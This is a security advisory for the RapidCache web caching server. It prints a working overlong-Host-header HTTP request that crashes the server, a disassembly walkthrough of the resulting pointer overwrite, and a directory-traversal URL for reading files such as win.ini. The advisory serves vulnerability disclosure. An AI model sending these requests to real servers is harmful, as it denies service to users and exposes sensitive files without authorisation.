|
Brought to you by:
Suppliers of:
|
|
|
| |
| RapidCache is "a high performance web caching server that adds all of the advantages of caching to a network already connected to the Internet. RapidCache includes a powerful web caching server with concurrent caching and page delivery. Web browser-based administration is included, with a java-based graphical status monitor". Multiple security vulnerabilities have been found in the product, one allows to cause the server to no longer process requests (DoS), while the other allows remote attackers to access files that would be otherwise in accessible (directory traversal). |
| |
Credit:
The original advisory can be found at http://www.elitehaven.net/rapidcache.txt.
The information has been provided by Peter Winter-Smith.
|
| |
Vulnerable systems:
* RapidCache version 2.2.6 and prior
Denial of Service Attack:
It seems possible to cause a remote RapidCache server to crash by issuing an overly long 'Host' argument as part of an HTTP GET request. An example of such a request is shown below (it may appear wrapped, please remove the excess linefeeds, etc):
---------------------------------------
GET / HTTP/1.1
Accept: */*..Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeBBBBXXX
X:8080
Connection: Keep-Alive
---------------------------------------
Analysis of the Vulnerable Code:
The crash is caused by the overwriting of a saved pointer (which points to the requested page header, 'GET / HTTP/1.1' in our case) with an arbitrary value.
The function that overwrites the saved pointer is at 0042D580 in memory, and is called from 0042BE12:
0042BE12 |. E8 69170000 CALL rapidcac.0042D580
0042BE17 |> 8BCE MOV ECX,ESI
Inside the function 0042D580, at the address 0042D614, we can see the dangerous instruction(s):
0042D614 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
If a long enough 'Host' header has been supplied, the saved pointer should become completely overwritten.
The dangerous function 0042D580 returns without a problem, and code execution continues until a call is made to the procedure 0042D620. Inside this procedure, at 0042D636, the value 2374h is added the EBP register, causing it to point to the overwritten saved pointer. Then at 0042D63E the overwritten pointer is moved into the EAX register, which is used in a call to msvcrt.strcspn() (made from 0042D64C) as the 's1' argument.
0042D636 |. 81C5 74230000 ADD EBP,2374
0042D63C |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
0042D63E |. 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
0042D641 |. 68 74144500 PUSH rapidcac.00451474 ; s2
0042D646 |. F7D1 NOT ECX
0042D648 |. 49 DEC ECX
0042D649 |. 50 PUSH EAX ; s1
0042D64A |. 8BF1 MOV ESI,ECX
0042D64C |. FF15 5CB84300 CALL DWORD PTR DS:[<&MSVCRT.strcspn>]
0042D652 |. 8B5D 00 MOV EBX,DWORD PTR SS:[EBP]
Inside strcspn(), at offset 77C437F1, the value located at ebp+08h, a copy of the overwritten pointer, (our 's1' argument to strcspn()), is loaded into the esi register.
77C437F1 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
Moments later into the strcspn(), at the address 77C437F9, the function attempts to read data from the overwritten pointer into the al register.
77C437F9 8A06 MOV AL,BYTE PTR DS:[ESI]
If it is unable to open the address in the esi register, the application will cause an access violation and crash, denying any further service to users.
Directory Traversal Bug:
It appears that the Denial of Service bug is not the only flaw present in the RapidCache application. It is also very easy to view or download almost any file on the remote system simply by issuing a request similar to the following:
http://127.0.0.1:8080/../../../../../../../../windows/win.ini
This can allow the exposure of sensitive information, password files, and so forth.
|
|
|
|
|
